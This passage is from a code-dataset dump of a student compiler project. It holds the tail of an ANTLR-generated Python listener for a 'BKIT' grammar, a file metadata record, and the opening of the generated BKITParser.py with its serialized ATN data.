# Exit a parse 
tree produced by BKITParser#return_stmt.\n def exitReturn_stmt(self, ctx:BKITParser.Return_stmtContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr.\n def enterExpr(self, ctx:BKITParser.ExprContext):\n pass\n\n # Exit a parse tree produced by BKITParser#expr.\n def exitExpr(self, ctx:BKITParser.ExprContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr1.\n def enterExpr1(self, ctx:BKITParser.Expr1Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr1.\n def exitExpr1(self, ctx:BKITParser.Expr1Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr2.\n def enterExpr2(self, ctx:BKITParser.Expr2Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr2.\n def exitExpr2(self, ctx:BKITParser.Expr2Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr3.\n def enterExpr3(self, ctx:BKITParser.Expr3Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr3.\n def exitExpr3(self, ctx:BKITParser.Expr3Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr4.\n def enterExpr4(self, ctx:BKITParser.Expr4Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr4.\n def exitExpr4(self, ctx:BKITParser.Expr4Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr5.\n def enterExpr5(self, ctx:BKITParser.Expr5Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr5.\n def exitExpr5(self, ctx:BKITParser.Expr5Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr6.\n def enterExpr6(self, ctx:BKITParser.Expr6Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr6.\n def exitExpr6(self, ctx:BKITParser.Expr6Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#array_cell.\n def enterArray_cell(self, ctx:BKITParser.Array_cellContext):\n pass\n\n # Exit a parse tree produced by BKITParser#array_cell.\n def exitArray_cell(self, ctx:BKITParser.Array_cellContext):\n pass\n\n\n # Enter a parse 
tree produced by BKITParser#expr7.\n def enterExpr7(self, ctx:BKITParser.Expr7Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr7.\n def exitExpr7(self, ctx:BKITParser.Expr7Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#expr8.\n def enterExpr8(self, ctx:BKITParser.Expr8Context):\n pass\n\n # Exit a parse tree produced by BKITParser#expr8.\n def exitExpr8(self, ctx:BKITParser.Expr8Context):\n pass\n\n\n # Enter a parse tree produced by BKITParser#operand.\n def enterOperand(self, ctx:BKITParser.OperandContext):\n pass\n\n # Exit a parse tree produced by BKITParser#operand.\n def exitOperand(self, ctx:BKITParser.OperandContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#function_call.\n def enterFunction_call(self, ctx:BKITParser.Function_callContext):\n pass\n\n # Exit a parse tree produced by BKITParser#function_call.\n def exitFunction_call(self, ctx:BKITParser.Function_callContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#index_op.\n def enterIndex_op(self, ctx:BKITParser.Index_opContext):\n pass\n\n # Exit a parse tree produced by BKITParser#index_op.\n def exitIndex_op(self, ctx:BKITParser.Index_opContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#array.\n def enterArray(self, ctx:BKITParser.ArrayContext):\n pass\n\n # Exit a parse tree produced by BKITParser#array.\n def exitArray(self, ctx:BKITParser.ArrayContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#primitive_data.\n def enterPrimitive_data(self, ctx:BKITParser.Primitive_dataContext):\n pass\n\n # Exit a parse tree produced by BKITParser#primitive_data.\n def exitPrimitive_data(self, ctx:BKITParser.Primitive_dataContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#array_lit.\n def enterArray_lit(self, ctx:BKITParser.Array_litContext):\n pass\n\n # Exit a parse tree produced by BKITParser#array_lit.\n def exitArray_lit(self, ctx:BKITParser.Array_litContext):\n pass\n\n\n # Enter a parse 
tree produced by BKITParser#var_list.\n def enterVar_list(self, ctx:BKITParser.Var_listContext):\n pass\n\n # Exit a parse tree produced by BKITParser#var_list.\n def exitVar_list(self, ctx:BKITParser.Var_listContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#var_init.\n def enterVar_init(self, ctx:BKITParser.Var_initContext):\n pass\n\n # Exit a parse tree produced by BKITParser#var_init.\n def exitVar_init(self, ctx:BKITParser.Var_initContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#var_non_init.\n def enterVar_non_init(self, ctx:BKITParser.Var_non_initContext):\n pass\n\n # Exit a parse tree produced by BKITParser#var_non_init.\n def exitVar_non_init(self, ctx:BKITParser.Var_non_initContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#composite_var.\n def enterComposite_var(self, ctx:BKITParser.Composite_varContext):\n pass\n\n # Exit a parse tree produced by BKITParser#composite_var.\n def exitComposite_var(self, ctx:BKITParser.Composite_varContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#composite_init.\n def enterComposite_init(self, ctx:BKITParser.Composite_initContext):\n pass\n\n # Exit a parse tree produced by BKITParser#composite_init.\n def exitComposite_init(self, ctx:BKITParser.Composite_initContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#primitive_init.\n def enterPrimitive_init(self, ctx:BKITParser.Primitive_initContext):\n pass\n\n # Exit a parse tree produced by BKITParser#primitive_init.\n def exitPrimitive_init(self, ctx:BKITParser.Primitive_initContext):\n pass\n\n\n # Enter a parse tree produced by BKITParser#params_list.\n def enterParams_list(self, ctx:BKITParser.Params_listContext):\n pass\n\n # Exit a parse tree produced by BKITParser#params_list.\n def exitParams_list(self, ctx:BKITParser.Params_listContext):\n pass\n\n\n\ndel BKITParser" }, { "alpha_fraction": 0.4811396300792694, "alphanum_fraction": 0.5494943857192993, "avg_line_length": 
33.6207389831543, "blob_id": "3cdcf1175436ce25d1a2e3acce3316222cfcf199", "content_id": "0827cad5a7649ddd687b2bef79b2c3c4d0ca5744", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 97506, "license_type": "no_license", "max_line_length": 328, "num_lines": 2816, "path": "/Assignments/assignment2/src1.0/main/bkit/parser/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/Assignments/assignment2/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3S\")\n buf.write(\"\\u01a3\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\")\n buf.write(\"\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\")\n buf.write(\"\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t\")\n buf.write(\"&\\3\\2\\3\\2\\3\\2\\7\\2P\\n\\2\\f\\2\\16\\2S\\13\\2\\3\\2\\7\\2V\\n\\2\\f\\2\")\n buf.write(\"\\16\\2Y\\13\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\5\\4g\\n\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\7\\4n\\n\\4\\f\\4\\16\\4\")\n buf.write(\"q\\13\\4\\3\\4\\7\\4t\\n\\4\\f\\4\\16\\4w\\13\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\")\n buf.write(\"\\3\\5\\3\\5\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\5\\7\\u0085\\n\\7\\3\\7\\3\\7\\3\\7\")\n 
buf.write(\"\\5\\7\\u008a\\n\\7\\7\\7\\u008c\\n\\7\\f\\7\\16\\7\\u008f\\13\\7\\5\\7\\u0091\")\n buf.write(\"\\n\\7\\3\\7\\3\\7\\3\\b\\3\\b\\5\\b\\u0097\\n\\b\\3\\b\\3\\b\\3\\b\\5\\b\\u009c\")\n buf.write(\"\\n\\b\\7\\b\\u009e\\n\\b\\f\\b\\16\\b\\u00a1\\13\\b\\3\\t\\3\\t\\3\\t\\3\\t\")\n buf.write(\"\\6\\t\\u00a7\\n\\t\\r\\t\\16\\t\\u00a8\\3\\t\\5\\t\\u00ac\\n\\t\\3\\n\\3\")\n buf.write(\"\\n\\3\\n\\3\\n\\3\\n\\6\\n\\u00b3\\n\\n\\r\\n\\16\\n\\u00b4\\3\\13\\3\\13\")\n buf.write(\"\\3\\13\\3\\13\\6\\13\\u00bb\\n\\13\\r\\13\\16\\13\\u00bc\\3\\13\\5\\13\")\n buf.write(\"\\u00c0\\n\\13\\3\\13\\3\\13\\3\\13\\5\\13\\u00c5\\n\\13\\3\\f\\3\\f\\3\\f\")\n buf.write(\"\\3\\f\\3\\r\\3\\r\\3\\r\\3\\r\\3\\16\\3\\16\\3\\16\\7\\16\\u00d2\\n\\16\\f\")\n buf.write(\"\\16\\16\\16\\u00d5\\13\\16\\3\\17\\3\\17\\3\\17\\7\\17\\u00da\\n\\17\\f\")\n buf.write(\"\\17\\16\\17\\u00dd\\13\\17\\3\\17\\7\\17\\u00e0\\n\\17\\f\\17\\16\\17\")\n buf.write(\"\\u00e3\\13\\17\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\")\n buf.write(\"\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\\3\\20\")\n buf.write(\"\\5\\20\\u00f8\\n\\20\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\3\")\n buf.write(\"\\21\\3\\21\\7\\21\\u0103\\n\\21\\f\\21\\16\\21\\u0106\\13\\21\\3\\21\\3\")\n buf.write(\"\\21\\5\\21\\u010a\\n\\21\\3\\21\\3\\21\\3\\21\\3\\22\\3\\22\\3\\23\\3\\23\")\n buf.write(\"\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\")\n buf.write(\"\\3\\23\\3\\23\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\3\\25\\3\\25\")\n buf.write(\"\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\26\\3\\26\\5\\26\\u0130\\n\\26\\3\")\n buf.write(\"\\26\\3\\26\\3\\26\\3\\27\\3\\27\\3\\30\\3\\30\\3\\31\\3\\31\\3\\32\\3\\32\")\n buf.write(\"\\5\\32\\u013d\\n\\32\\3\\33\\3\\33\\3\\33\\3\\33\\3\\33\\5\\33\\u0144\\n\")\n buf.write(\"\\33\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\7\\34\\u014c\\n\\34\\f\\34\")\n 
buf.write(\"\\16\\34\\u014f\\13\\34\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\7\\35\")\n buf.write(\"\\u0157\\n\\35\\f\\35\\16\\35\\u015a\\13\\35\\3\\36\\3\\36\\3\\36\\3\\36\")\n buf.write(\"\\3\\36\\3\\36\\7\\36\\u0162\\n\\36\\f\\36\\16\\36\\u0165\\13\\36\\3\\37\")\n buf.write(\"\\3\\37\\3\\37\\5\\37\\u016a\\n\\37\\3 \\3 \\3 \\5 \\u016f\\n \\3!\\3!\")\n buf.write(\"\\3!\\3!\\5!\\u0175\\n!\\3\\\"\\3\\\"\\5\\\"\\u0179\\n\\\"\\3#\\3#\\3#\\3#\\3\")\n buf.write(\"#\\5#\\u0180\\n#\\3$\\3$\\3$\\5$\\u0185\\n$\\3%\\3%\\3%\\3%\\3%\\7%\\u018c\")\n buf.write(\"\\n%\\f%\\16%\\u018f\\13%\\7%\\u0191\\n%\\f%\\16%\\u0194\\13%\\3%\\3\")\n buf.write(\"%\\3&\\3&\\3&\\3&\\3&\\3&\\3&\\3&\\3&\\5&\\u01a1\\n&\\3&\\2\\5\\668:\\'\")\n buf.write(\"\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\32\\34\\36 \\\"$&(*,.\\60\\62\")\n buf.write(\"\\64\\668:<>@BDFHJ\\2\\3\\3\\2\\n\\r\\2\\u01ac\\2Q\\3\\2\\2\\2\\4\\\\\\3\")\n buf.write(\"\\2\\2\\2\\6`\\3\\2\\2\\2\\b{\\3\\2\\2\\2\\n\\177\\3\\2\\2\\2\\f\\u0081\\3\\2\")\n buf.write(\"\\2\\2\\16\\u0096\\3\\2\\2\\2\\20\\u00ab\\3\\2\\2\\2\\22\\u00ad\\3\\2\\2\")\n buf.write(\"\\2\\24\\u00bf\\3\\2\\2\\2\\26\\u00c6\\3\\2\\2\\2\\30\\u00ca\\3\\2\\2\\2\")\n buf.write(\"\\32\\u00ce\\3\\2\\2\\2\\34\\u00db\\3\\2\\2\\2\\36\\u00f7\\3\\2\\2\\2 \\u00f9\")\n buf.write(\"\\3\\2\\2\\2\\\"\\u010e\\3\\2\\2\\2$\\u0110\\3\\2\\2\\2&\\u011f\\3\\2\\2\\2\")\n buf.write(\"(\\u0126\\3\\2\\2\\2*\\u012f\\3\\2\\2\\2,\\u0134\\3\\2\\2\\2.\\u0136\\3\")\n buf.write(\"\\2\\2\\2\\60\\u0138\\3\\2\\2\\2\\62\\u013a\\3\\2\\2\\2\\64\\u0143\\3\\2\")\n buf.write(\"\\2\\2\\66\\u0145\\3\\2\\2\\28\\u0150\\3\\2\\2\\2:\\u015b\\3\\2\\2\\2<\\u0169\")\n buf.write(\"\\3\\2\\2\\2>\\u016e\\3\\2\\2\\2@\\u0174\\3\\2\\2\\2B\\u0178\\3\\2\\2\\2\")\n buf.write(\"D\\u017f\\3\\2\\2\\2F\\u0184\\3\\2\\2\\2H\\u0186\\3\\2\\2\\2J\\u01a0\\3\")\n buf.write(\"\\2\\2\\2LM\\5\\4\\3\\2MN\\7B\\2\\2NP\\3\\2\\2\\2OL\\3\\2\\2\\2PS\\3\\2\\2\")\n 
buf.write(\"\\2QO\\3\\2\\2\\2QR\\3\\2\\2\\2RW\\3\\2\\2\\2SQ\\3\\2\\2\\2TV\\5\\6\\4\\2U\")\n buf.write(\"T\\3\\2\\2\\2VY\\3\\2\\2\\2WU\\3\\2\\2\\2WX\\3\\2\\2\\2XZ\\3\\2\\2\\2YW\\3\")\n buf.write(\"\\2\\2\\2Z[\\7\\2\\2\\3[\\3\\3\\2\\2\\2\\\\]\\7\\36\\2\\2]^\\7@\\2\\2^_\\5\\16\")\n buf.write(\"\\b\\2_\\5\\3\\2\\2\\2`a\\7\\31\\2\\2ab\\7@\\2\\2bf\\7\\3\\2\\2cd\\7\\33\\2\")\n buf.write(\"\\2de\\7@\\2\\2eg\\5\\32\\16\\2fc\\3\\2\\2\\2fg\\3\\2\\2\\2gh\\3\\2\\2\\2\")\n buf.write(\"hi\\7\\16\\2\\2io\\7@\\2\\2jk\\5\\\"\\22\\2kl\\7B\\2\\2ln\\3\\2\\2\\2mj\\3\")\n buf.write(\"\\2\\2\\2nq\\3\\2\\2\\2om\\3\\2\\2\\2op\\3\\2\\2\\2pu\\3\\2\\2\\2qo\\3\\2\\2\")\n buf.write(\"\\2rt\\5\\36\\20\\2sr\\3\\2\\2\\2tw\\3\\2\\2\\2us\\3\\2\\2\\2uv\\3\\2\\2\\2\")\n buf.write(\"vx\\3\\2\\2\\2wu\\3\\2\\2\\2xy\\7\\25\\2\\2yz\\7A\\2\\2z\\7\\3\\2\\2\\2{|\")\n buf.write(\"\\7\\3\\2\\2|}\\7D\\2\\2}~\\5\\f\\7\\2~\\t\\3\\2\\2\\2\\177\\u0080\\t\\2\\2\")\n buf.write(\"\\2\\u0080\\13\\3\\2\\2\\2\\u0081\\u0090\\7>\\2\\2\\u0082\\u0085\\5\\n\")\n buf.write(\"\\6\\2\\u0083\\u0085\\5\\f\\7\\2\\u0084\\u0082\\3\\2\\2\\2\\u0084\\u0083\")\n buf.write(\"\\3\\2\\2\\2\\u0085\\u008d\\3\\2\\2\\2\\u0086\\u0089\\7C\\2\\2\\u0087\")\n buf.write(\"\\u008a\\5\\n\\6\\2\\u0088\\u008a\\5\\f\\7\\2\\u0089\\u0087\\3\\2\\2\\2\")\n buf.write(\"\\u0089\\u0088\\3\\2\\2\\2\\u008a\\u008c\\3\\2\\2\\2\\u008b\\u0086\\3\")\n buf.write(\"\\2\\2\\2\\u008c\\u008f\\3\\2\\2\\2\\u008d\\u008b\\3\\2\\2\\2\\u008d\\u008e\")\n buf.write(\"\\3\\2\\2\\2\\u008e\\u0091\\3\\2\\2\\2\\u008f\\u008d\\3\\2\\2\\2\\u0090\")\n buf.write(\"\\u0084\\3\\2\\2\\2\\u0090\\u0091\\3\\2\\2\\2\\u0091\\u0092\\3\\2\\2\\2\")\n buf.write(\"\\u0092\\u0093\\7?\\2\\2\\u0093\\r\\3\\2\\2\\2\\u0094\\u0097\\5\\20\\t\")\n buf.write(\"\\2\\u0095\\u0097\\5\\24\\13\\2\\u0096\\u0094\\3\\2\\2\\2\\u0096\\u0095\")\n buf.write(\"\\3\\2\\2\\2\\u0097\\u009f\\3\\2\\2\\2\\u0098\\u009b\\7C\\2\\2\\u0099\")\n buf.write(\"\\u009c\\5\\20\\t\\2\\u009a\\u009c\\5\\24\\13\\2\\u009b\\u0099\\3\\2\")\n 
buf.write(\"\\2\\2\\u009b\\u009a\\3\\2\\2\\2\\u009c\\u009e\\3\\2\\2\\2\\u009d\\u0098\")\n buf.write(\"\\3\\2\\2\\2\\u009e\\u00a1\\3\\2\\2\\2\\u009f\\u009d\\3\\2\\2\\2\\u009f\")\n buf.write(\"\\u00a0\\3\\2\\2\\2\\u00a0\\17\\3\\2\\2\\2\\u00a1\\u009f\\3\\2\\2\\2\\u00a2\")\n buf.write(\"\\u00a6\\7\\3\\2\\2\\u00a3\\u00a4\\7<\\2\\2\\u00a4\\u00a5\\7\\n\\2\\2\")\n buf.write(\"\\u00a5\\u00a7\\7=\\2\\2\\u00a6\\u00a3\\3\\2\\2\\2\\u00a7\\u00a8\\3\")\n buf.write(\"\\2\\2\\2\\u00a8\\u00a6\\3\\2\\2\\2\\u00a8\\u00a9\\3\\2\\2\\2\\u00a9\\u00ac\")\n buf.write(\"\\3\\2\\2\\2\\u00aa\\u00ac\\7\\3\\2\\2\\u00ab\\u00a2\\3\\2\\2\\2\\u00ab\")\n buf.write(\"\\u00aa\\3\\2\\2\\2\\u00ac\\21\\3\\2\\2\\2\\u00ad\\u00b2\\7\\3\\2\\2\\u00ae\")\n buf.write(\"\\u00af\\7<\\2\\2\\u00af\\u00b0\\5\\64\\33\\2\\u00b0\\u00b1\\7=\\2\\2\")\n buf.write(\"\\u00b1\\u00b3\\3\\2\\2\\2\\u00b2\\u00ae\\3\\2\\2\\2\\u00b3\\u00b4\\3\")\n buf.write(\"\\2\\2\\2\\u00b4\\u00b2\\3\\2\\2\\2\\u00b4\\u00b5\\3\\2\\2\\2\\u00b5\\23\")\n buf.write(\"\\3\\2\\2\\2\\u00b6\\u00ba\\7\\3\\2\\2\\u00b7\\u00b8\\7<\\2\\2\\u00b8\")\n buf.write(\"\\u00b9\\7\\n\\2\\2\\u00b9\\u00bb\\7=\\2\\2\\u00ba\\u00b7\\3\\2\\2\\2\")\n buf.write(\"\\u00bb\\u00bc\\3\\2\\2\\2\\u00bc\\u00ba\\3\\2\\2\\2\\u00bc\\u00bd\\3\")\n buf.write(\"\\2\\2\\2\\u00bd\\u00c0\\3\\2\\2\\2\\u00be\\u00c0\\7\\3\\2\\2\\u00bf\\u00b6\")\n buf.write(\"\\3\\2\\2\\2\\u00bf\\u00be\\3\\2\\2\\2\\u00c0\\u00c1\\3\\2\\2\\2\\u00c1\")\n buf.write(\"\\u00c4\\7D\\2\\2\\u00c2\\u00c5\\5\\f\\7\\2\\u00c3\\u00c5\\5\\n\\6\\2\")\n buf.write(\"\\u00c4\\u00c2\\3\\2\\2\\2\\u00c4\\u00c3\\3\\2\\2\\2\\u00c5\\25\\3\\2\")\n buf.write(\"\\2\\2\\u00c6\\u00c7\\5\\22\\n\\2\\u00c7\\u00c8\\7D\\2\\2\\u00c8\\u00c9\")\n buf.write(\"\\5\\f\\7\\2\\u00c9\\27\\3\\2\\2\\2\\u00ca\\u00cb\\7\\3\\2\\2\\u00cb\\u00cc\")\n buf.write(\"\\7D\\2\\2\\u00cc\\u00cd\\5\\n\\6\\2\\u00cd\\31\\3\\2\\2\\2\\u00ce\\u00d3\")\n buf.write(\"\\5\\20\\t\\2\\u00cf\\u00d0\\7C\\2\\2\\u00d0\\u00d2\\5\\20\\t\\2\\u00d1\")\n 
buf.write(\"\\u00cf\\3\\2\\2\\2\\u00d2\\u00d5\\3\\2\\2\\2\\u00d3\\u00d1\\3\\2\\2\\2\")\n buf.write(\"\\u00d3\\u00d4\\3\\2\\2\\2\\u00d4\\33\\3\\2\\2\\2\\u00d5\\u00d3\\3\\2\")\n buf.write(\"\\2\\2\\u00d6\\u00d7\\5\\\"\\22\\2\\u00d7\\u00d8\\7B\\2\\2\\u00d8\\u00da\")\n buf.write(\"\\3\\2\\2\\2\\u00d9\\u00d6\\3\\2\\2\\2\\u00da\\u00dd\\3\\2\\2\\2\\u00db\")\n buf.write(\"\\u00d9\\3\\2\\2\\2\\u00db\\u00dc\\3\\2\\2\\2\\u00dc\\u00e1\\3\\2\\2\\2\")\n buf.write(\"\\u00dd\\u00db\\3\\2\\2\\2\\u00de\\u00e0\\5\\36\\20\\2\\u00df\\u00de\")\n buf.write(\"\\3\\2\\2\\2\\u00e0\\u00e3\\3\\2\\2\\2\\u00e1\\u00df\\3\\2\\2\\2\\u00e1\")\n buf.write(\"\\u00e2\\3\\2\\2\\2\\u00e2\\35\\3\\2\\2\\2\\u00e3\\u00e1\\3\\2\\2\\2\\u00e4\")\n buf.write(\"\\u00f8\\5 \\21\\2\\u00e5\\u00f8\\5$\\23\\2\\u00e6\\u00f8\\5&\\24\\2\")\n buf.write(\"\\u00e7\\u00f8\\5(\\25\\2\\u00e8\\u00e9\\5*\\26\\2\\u00e9\\u00ea\\7\")\n buf.write(\"B\\2\\2\\u00ea\\u00f8\\3\\2\\2\\2\\u00eb\\u00ec\\5,\\27\\2\\u00ec\\u00ed\")\n buf.write(\"\\7B\\2\\2\\u00ed\\u00f8\\3\\2\\2\\2\\u00ee\\u00ef\\5.\\30\\2\\u00ef\")\n buf.write(\"\\u00f0\\7B\\2\\2\\u00f0\\u00f8\\3\\2\\2\\2\\u00f1\\u00f2\\5\\60\\31\")\n buf.write(\"\\2\\u00f2\\u00f3\\7B\\2\\2\\u00f3\\u00f8\\3\\2\\2\\2\\u00f4\\u00f5\")\n buf.write(\"\\5\\62\\32\\2\\u00f5\\u00f6\\7B\\2\\2\\u00f6\\u00f8\\3\\2\\2\\2\\u00f7\")\n buf.write(\"\\u00e4\\3\\2\\2\\2\\u00f7\\u00e5\\3\\2\\2\\2\\u00f7\\u00e6\\3\\2\\2\\2\")\n buf.write(\"\\u00f7\\u00e7\\3\\2\\2\\2\\u00f7\\u00e8\\3\\2\\2\\2\\u00f7\\u00eb\\3\")\n buf.write(\"\\2\\2\\2\\u00f7\\u00ee\\3\\2\\2\\2\\u00f7\\u00f1\\3\\2\\2\\2\\u00f7\\u00f4\")\n buf.write(\"\\3\\2\\2\\2\\u00f8\\37\\3\\2\\2\\2\\u00f9\\u00fa\\7\\32\\2\\2\\u00fa\\u00fb\")\n buf.write(\"\\5\\64\\33\\2\\u00fb\\u00fc\\7\\35\\2\\2\\u00fc\\u0104\\5\\34\\17\\2\")\n buf.write(\"\\u00fd\\u00fe\\7\\23\\2\\2\\u00fe\\u00ff\\5\\64\\33\\2\\u00ff\\u0100\")\n buf.write(\"\\7\\35\\2\\2\\u0100\\u0101\\5\\34\\17\\2\\u0101\\u0103\\3\\2\\2\\2\\u0102\")\n 
buf.write(\"\\u00fd\\3\\2\\2\\2\\u0103\\u0106\\3\\2\\2\\2\\u0104\\u0102\\3\\2\\2\\2\")\n buf.write(\"\\u0104\\u0105\\3\\2\\2\\2\\u0105\\u0109\\3\\2\\2\\2\\u0106\\u0104\\3\")\n buf.write(\"\\2\\2\\2\\u0107\\u0108\\7\\22\\2\\2\\u0108\\u010a\\5\\34\\17\\2\\u0109\")\n buf.write(\"\\u0107\\3\\2\\2\\2\\u0109\\u010a\\3\\2\\2\\2\\u010a\\u010b\\3\\2\\2\\2\")\n buf.write(\"\\u010b\\u010c\\7\\24\\2\\2\\u010c\\u010d\\7A\\2\\2\\u010d!\\3\\2\\2\")\n buf.write(\"\\2\\u010e\\u010f\\5\\4\\3\\2\\u010f#\\3\\2\\2\\2\\u0110\\u0111\\7\\30\")\n buf.write(\"\\2\\2\\u0111\\u0112\\7:\\2\\2\\u0112\\u0113\\7\\3\\2\\2\\u0113\\u0114\")\n buf.write(\"\\7D\\2\\2\\u0114\\u0115\\5\\64\\33\\2\\u0115\\u0116\\7C\\2\\2\\u0116\")\n buf.write(\"\\u0117\\5\\64\\33\\2\\u0117\\u0118\\7C\\2\\2\\u0118\\u0119\\5\\64\\33\")\n buf.write(\"\\2\\u0119\\u011a\\7;\\2\\2\\u011a\\u011b\\7\\21\\2\\2\\u011b\\u011c\")\n buf.write(\"\\5\\34\\17\\2\\u011c\\u011d\\7\\26\\2\\2\\u011d\\u011e\\7A\\2\\2\\u011e\")\n buf.write(\"%\\3\\2\\2\\2\\u011f\\u0120\\7\\37\\2\\2\\u0120\\u0121\\5\\64\\33\\2\\u0121\")\n buf.write(\"\\u0122\\7\\21\\2\\2\\u0122\\u0123\\5\\34\\17\\2\\u0123\\u0124\\7\\27\")\n buf.write(\"\\2\\2\\u0124\\u0125\\7A\\2\\2\\u0125\\'\\3\\2\\2\\2\\u0126\\u0127\\7\")\n buf.write(\"\\21\\2\\2\\u0127\\u0128\\5\\34\\17\\2\\u0128\\u0129\\7\\37\\2\\2\\u0129\")\n buf.write(\"\\u012a\\5\\64\\33\\2\\u012a\\u012b\\7\\\"\\2\\2\\u012b\\u012c\\7A\\2\")\n buf.write(\"\\2\\u012c)\\3\\2\\2\\2\\u012d\\u0130\\5\\22\\n\\2\\u012e\\u0130\\7\\3\")\n buf.write(\"\\2\\2\\u012f\\u012d\\3\\2\\2\\2\\u012f\\u012e\\3\\2\\2\\2\\u0130\\u0131\")\n buf.write(\"\\3\\2\\2\\2\\u0131\\u0132\\7D\\2\\2\\u0132\\u0133\\5\\64\\33\\2\\u0133\")\n buf.write(\"+\\3\\2\\2\\2\\u0134\\u0135\\7\\17\\2\\2\\u0135-\\3\\2\\2\\2\\u0136\\u0137\")\n buf.write(\"\\7\\20\\2\\2\\u0137/\\3\\2\\2\\2\\u0138\\u0139\\5H%\\2\\u0139\\61\\3\")\n buf.write(\"\\2\\2\\2\\u013a\\u013c\\7\\34\\2\\2\\u013b\\u013d\\5\\64\\33\\2\\u013c\")\n 
buf.write(\"\\u013b\\3\\2\\2\\2\\u013c\\u013d\\3\\2\\2\\2\\u013d\\63\\3\\2\\2\\2\\u013e\")\n buf.write(\"\\u013f\\5\\66\\34\\2\\u013f\\u0140\\7\\4\\2\\2\\u0140\\u0141\\5\\66\")\n buf.write(\"\\34\\2\\u0141\\u0144\\3\\2\\2\\2\\u0142\\u0144\\5\\66\\34\\2\\u0143\")\n buf.write(\"\\u013e\\3\\2\\2\\2\\u0143\\u0142\\3\\2\\2\\2\\u0144\\65\\3\\2\\2\\2\\u0145\")\n buf.write(\"\\u0146\\b\\34\\1\\2\\u0146\\u0147\\58\\35\\2\\u0147\\u014d\\3\\2\\2\")\n buf.write(\"\\2\\u0148\\u0149\\f\\4\\2\\2\\u0149\\u014a\\7\\5\\2\\2\\u014a\\u014c\")\n buf.write(\"\\58\\35\\2\\u014b\\u0148\\3\\2\\2\\2\\u014c\\u014f\\3\\2\\2\\2\\u014d\")\n buf.write(\"\\u014b\\3\\2\\2\\2\\u014d\\u014e\\3\\2\\2\\2\\u014e\\67\\3\\2\\2\\2\\u014f\")\n buf.write(\"\\u014d\\3\\2\\2\\2\\u0150\\u0151\\b\\35\\1\\2\\u0151\\u0152\\5:\\36\")\n buf.write(\"\\2\\u0152\\u0158\\3\\2\\2\\2\\u0153\\u0154\\f\\4\\2\\2\\u0154\\u0155\")\n buf.write(\"\\7\\6\\2\\2\\u0155\\u0157\\5:\\36\\2\\u0156\\u0153\\3\\2\\2\\2\\u0157\")\n buf.write(\"\\u015a\\3\\2\\2\\2\\u0158\\u0156\\3\\2\\2\\2\\u0158\\u0159\\3\\2\\2\\2\")\n buf.write(\"\\u01599\\3\\2\\2\\2\\u015a\\u0158\\3\\2\\2\\2\\u015b\\u015c\\b\\36\\1\")\n 